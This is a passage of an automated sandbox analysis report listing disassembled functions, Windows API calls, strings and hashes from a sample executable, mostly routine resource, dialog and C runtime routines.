Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz
API String ID: 445417207-3234807970
Opcode ID: fdc38bff28f5695a16a5cf7c018e894ac6e1808fc41145db8c089b27e76657c4
Instruction ID: 3a2832b77547f1485f3d4652ebc5cae041e21a6bdf6d6168a1e31f98bb5e201d
Opcode Fuzzy Hash: fdc38bff28f5695a16a5cf7c018e894ac6e1808fc41145db8c089b27e76657c4
Instruction Fuzzy Hash: 01110232940119BADB219A759C09FFF3B2CEB09724F050022FA85B2280C7A4E9059A74

Function 00DDB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00DDB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00DDB712
DeleteObject.GDI32(00000000), ref: 00DDB744
DeleteObject.GDI32(00000000), ref: 00DDB767

Part of subcall function 00DDA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00DDB73D,00000066), ref: 00DDA6D5
Part of subcall function 00DDA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00DDB73D,00000066), ref: 00DDA6EC
Part of subcall function 00DDA6C2: LoadResource.KERNEL32(00000000,?,?,?,00DDB73D,00000066), ref: 00DDA703
Part of subcall function 00DDA6C2: LockResource.KERNEL32(00000000,?,?,?,00DDB73D,00000066), ref: 00DDA712
Part of subcall function 00DDA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DDB73D,00000066), ref: 00DDA72D
Part of subcall function 00DDA6C2: GlobalLock.KERNEL32(00000000), ref: 00DDA73E
Part of subcall function 00DDA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DDA762
Part of subcall function 00DDA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DDA7A7
Part of subcall function 00DDA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00DDA7C6
Part of subcall function 00DDA6C2: GlobalFree.KERNEL32(00000000), ref: 00DDA7CD

Strings

], xrefs: 00DDB71A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 17ed1daf9e7fdb8f4c2b5a91f267c243e61012d3e11463d93840130589822381
Instruction ID: 5a40d3258deccdcdfc3f17926a4641a226ee263c34a8ade3c2f43fc6e1e11d91
Opcode Fuzzy Hash: 17ed1daf9e7fdb8f4c2b5a91f267c243e61012d3e11463d93840130589822381
Instruction Fuzzy Hash: 0101A136540611BBC72177785C09E6F7A79EBC0766F0A4017F900B7391DF65CD0A4672

Function 00DDD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00DC1316: GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
Part of subcall function 00DC1316: SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

EndDialog.USER32(?,00000001), ref: 00DDD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DDD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00DDD675
SetDlgItemTextW.USER32(?,00000068), ref: 00DDD684

Strings

RENAMEDLG, xrefs: 00DDD618

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 29be96eccb672048ac8b564843f7281162a1d7a83020b5df9a20911e2b7bfa19
Instruction ID: 9cb6d5c9a772e72e502555db41e0902ca3f5841013e5fbfd49cdf37c14de5e6a
Opcode Fuzzy Hash: 29be96eccb672048ac8b564843f7281162a1d7a83020b5df9a20911e2b7bfa19
Instruction Fuzzy Hash: 26012833245218BED6204F759D09F67B75EFB5AB01F214412F345B21D0C6A2D9099BF9

Function 00DE7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DE7E24,00000000,?,00DE7DC4,00000000,00DFC300,0000000C,00DE7F1B,00000000,00000002), ref: 00DE7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DE7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00DE7E24,00000000,?,00DE7DC4,00000000,00DFC300,0000000C,00DE7F1B,00000000,00000002), ref: 00DE7EC9

Strings

mscoree.dll, xrefs: 00DE7E8C
CorExitProcess, xrefs: 00DE7E9E

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a38425407d375bf26526293e0ddabd5b15c00c6059557bee16bcb196de647d17
Instruction ID: 7a01639ef6e85eb00027bd8b39418290dadf514e9ee2a1755ac164110e1ddbe9
Opcode Fuzzy Hash: a38425407d375bf26526293e0ddabd5b15c00c6059557bee16bcb196de647d17
Instruction Fuzzy Hash: 05F04431904209BBCB15AFA1DC09BBEBFB4EB44715F0580A9F805E2360DB309E44CBB4

Function 00DCF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DD0836
Part of subcall function 00DD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DCF2D8,Crypt32.dll,00000000,00DCF35C,?,?,00DCF33E,?,?,?), ref: 00DD0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DCF2E4
GetProcAddress.KERNEL32(00E081C8,CryptUnprotectMemory), ref: 00DCF2F4

Strings

CryptUnprotectMemory, xrefs: 00DCF2EA
Crypt32.dll, xrefs: 00DCF2CE
CryptProtectMemory, xrefs: 00DCF2DE

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 49c6e75afaaf3c84fcd33118fab33d75a3e03f92b0164bbe71792c810fb439a9
Instruction ID: 1c561c2a670e7c326e9fde6f3144331e6c9f511675132f7e2e7a322090b7ca2c
Opcode Fuzzy Hash: 49c6e75afaaf3c84fcd33118fab33d75a3e03f92b0164bbe71792c810fb439a9
Instruction Fuzzy Hash: 58E04F70911756AECB209F359849B61BED4AF04708F16C85EF1DAD3740DAB4D5448B70

Function 00DE2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00DE2CA1
___AdjustPointer.LIBCMT ref: 00DE2CC4
_abort.LIBCMT ref: 00DE2D12
___AdjustPointer.LIBCMT ref: 00DE2D60

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: e74578fbc27702088ab873c665094276a719a819e9f6ba4c0f453351f06bd590
Instruction ID: a18e5669ebdf449dbb0cd761a7f76744a5aa287f9cf42b40aa8202213fae4e2b
Opcode Fuzzy Hash: e74578fbc27702088ab873c665094276a719a819e9f6ba4c0f453351f06bd590
Instruction Fuzzy Hash: 1D51F171600296AFDB29AF16DC45BBA77A9FF10310F28412DEA02476A1D731ED80D7B0

Function 00DEBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00DEBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DEBF5C

Part of subcall function 00DE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DECA2C,00000000,?,00DE6CBE,?,00000008,?,00DE91E0,?,?,?), ref: 00DE8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DEBF82
_free.LIBCMT ref: 00DEBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DEBFA4

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0fca64d05344fb7e44fc3442e01b182757e2d342c7f22e2ec06bdd7f66c850a6
Instruction ID: 36848e937fd67ad6f632ac4a07e97910b85f128b4bb8bf871ac880f32ecc4211
Opcode Fuzzy Hash: 0fca64d05344fb7e44fc3442e01b182757e2d342c7f22e2ec06bdd7f66c850a6
Instruction Fuzzy Hash: 5E01DF726017917F27213ABB5C8CC7B7A6DEEC2BB0329412AF908D2200EF62DD01D5B0

Function 00DE9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00DE91AD,00DEB188,?,00DE9813,00000001,00000364,?,00DE3F73,00000050,?,00E01030,00000200), ref: 00DE986E
_free.LIBCMT ref: 00DE98A3
_free.LIBCMT ref: 00DE98CA
SetLastError.KERNEL32(00000000,?,00E01030,00000200), ref: 00DE98D7
SetLastError.KERNEL32(00000000,?,00E01030,00000200), ref: 00DE98E0

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6a5c2cdb32fc6780e7a779898779e19df64e234caed75b7466b8eff3b346be3a
Instruction ID: dc502ada9b1b982e374376e708e44c950cf0cd00c32cd739284a692e1c57e687
Opcode Fuzzy Hash: 6a5c2cdb32fc6780e7a779898779e19df64e234caed75b7466b8eff3b346be3a
Instruction Fuzzy Hash: 0D01F9762467C16BC22237676CE592BA62DDBD27747290236F505D22B1EE60CC019171

Function 00DD0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00DD11CF: ResetEvent.KERNEL32(?), ref: 00DD11E1
Part of subcall function 00DD11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00DD11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00DD0F21
CloseHandle.KERNEL32(?,?), ref: 00DD0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00DD0F54
CloseHandle.KERNEL32(?), ref: 00DD0F60
CloseHandle.KERNEL32(?), ref: 00DD0F6C

Part of subcall function 00DD0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00DD1206,?), ref: 00DD0FEA
Part of subcall function 00DD0FE4: GetLastError.KERNEL32(?), ref: 00DD0FF6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: c7326195d2e5d0b58f93a314765bb9066f0cdd48d2d7d92d50495f8c75d27d7d
Instruction ID: 47126dcc1e054dc146a61ddc0b96dfb24ce7d7eb86b67b7c328a0141d1978e0a
Opcode Fuzzy Hash: c7326195d2e5d0b58f93a314765bb9066f0cdd48d2d7d92d50495f8c75d27d7d
Instruction Fuzzy Hash: 8B014C72500744FFC722AF64DC84FD6BBAAFB48710F11492AF26A92260CB756A44CA60

Function 00DEC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00DEC817

Part of subcall function 00DE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?), ref: 00DE8DE2
Part of subcall function 00DE8DCC: GetLastError.KERNEL32(?,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?,?), ref: 00DE8DF4

_free.LIBCMT ref: 00DEC829
_free.LIBCMT ref: 00DEC83B
_free.LIBCMT ref: 00DEC84D
_free.LIBCMT ref: 00DEC85F

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 894e587157aed5464bdcdd8365149a71353b92207eefcbe0737b202da7305773
Instruction ID: 8f5d60e104dd52b12ac8efbb197e255df0663dfd5da71fcd43af6cbfb4b2d2ca
Opcode Fuzzy Hash: 894e587157aed5464bdcdd8365149a71353b92207eefcbe0737b202da7305773
Instruction Fuzzy Hash: BAF01272514281AF8620FB6BF9C5C1673EAEA14B1479C6819F148D7662CB70FC81CA74

Function 00DD1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DD1FE5
_wcslen.LIBCMT ref: 00DD1FF6
_wcslen.LIBCMT ref: 00DD2006
_wcslen.LIBCMT ref: 00DD2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00DCB371,?,?,00000000,?,?,?), ref: 00DD202F

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: b65ca6620cee4f0a9ffefcd53cd08e97492c0b07061324d59ceca6764eea985f
Instruction ID: c7f80b5f25c555717dfd7a6a66b12066e3005e4d6fc63860afbe6c0a53dd96f2
Opcode Fuzzy Hash: b65ca6620cee4f0a9ffefcd53cd08e97492c0b07061324d59ceca6764eea985f
Instruction Fuzzy Hash: DCF06D32008054BBCF222F51EC09DAA3F26EB40B60B118006F61A9B061CB72D661D6F0

Function 00DE8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DE891E

Part of subcall function 00DE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?), ref: 00DE8DE2
Part of subcall function 00DE8DCC: GetLastError.KERNEL32(?,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?,?), ref: 00DE8DF4

_free.LIBCMT ref: 00DE8930
_free.LIBCMT ref: 00DE8943
_free.LIBCMT ref: 00DE8954
_free.LIBCMT ref: 00DE8965

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4eb1b056392a0567906e88e5f99e601bfe37ac52642fd993fffc12c3912da129
Instruction ID: 5ff0b5e02923a55f2d1a6ad03d88a6decbd9aa50a53086b074451db98a8fdc5a
Opcode Fuzzy Hash: 4eb1b056392a0567906e88e5f99e601bfe37ac52642fd993fffc12c3912da129
Instruction Fuzzy Hash: 4DF0F472810266EFC6657F56FC014193FB1F724714309060DF61CA63B2CB324946EBB1

Function 00DD15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DD17BC
_swprintf.LIBCMT ref: 00DD186B

Strings

%s: %s, xrefs: 00DD17CB
%ls, xrefs: 00DD1641, 00DD1657

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 3cd9624c8256489b44bc3661c11ff2c63b7f8aae440f8c969acb6252d0d5f958
Instruction ID: bb1a269955fa7ecb777c3767111ce4b57e7a6287476453df13a8adf29b647c24
Opcode Fuzzy Hash: 3cd9624c8256489b44bc3661c11ff2c63b7f8aae440f8c969acb6252d0d5f958
Instruction Fuzzy Hash: D1512A3D2C8304FAF6215A908D46F367365EB05B04F244A07F3C6A57E1D9A2E411B73B

Function 00DE7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\gkcQYEdJSO.exe,00000104), ref: 00DE7FAE
_free.LIBCMT ref: 00DE8079
_free.LIBCMT ref: 00DE8083

Strings

C:\Users\user\Desktop\gkcQYEdJSO.exe, xrefs: 00DE7FA5, 00DE7FAC, 00DE7FDB, 00DE8013

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\gkcQYEdJSO.exe
API String ID: 2506810119-452095740
Opcode ID: 8b72ab180dda8800f46d9357f0a7d38e99d29a05e10cc9c92d1aeb61d7284c9a
Instruction ID: 2cf5933983f739de46d427347a4cdf1bfaaaded940f9ffce073503ebb00fffd9
Opcode Fuzzy Hash: 8b72ab180dda8800f46d9357f0a7d38e99d29a05e10cc9c92d1aeb61d7284c9a
Instruction Fuzzy Hash: CE319171A00298AFDB21FF96DC85D9EBBBCEF85310F14406AF508A7211DA718E45DB71

Function 00DE31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00DE31FB
_abort.LIBCMT ref: 00DE3306

Strings

MOC, xrefs: 00DE320D
RCC, xrefs: 00DE3215

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: a53d605d7eeb8b3ca74ab809f408be3663387e525f418a16cb1c88a60b9c078d
Instruction ID: d70b55de00d3c150b0bc85b87e7aaff1df48489f5f8dc0be65292896fbf51400
Opcode Fuzzy Hash: a53d605d7eeb8b3ca74ab809f408be3663387e525f418a16cb1c88a60b9c078d
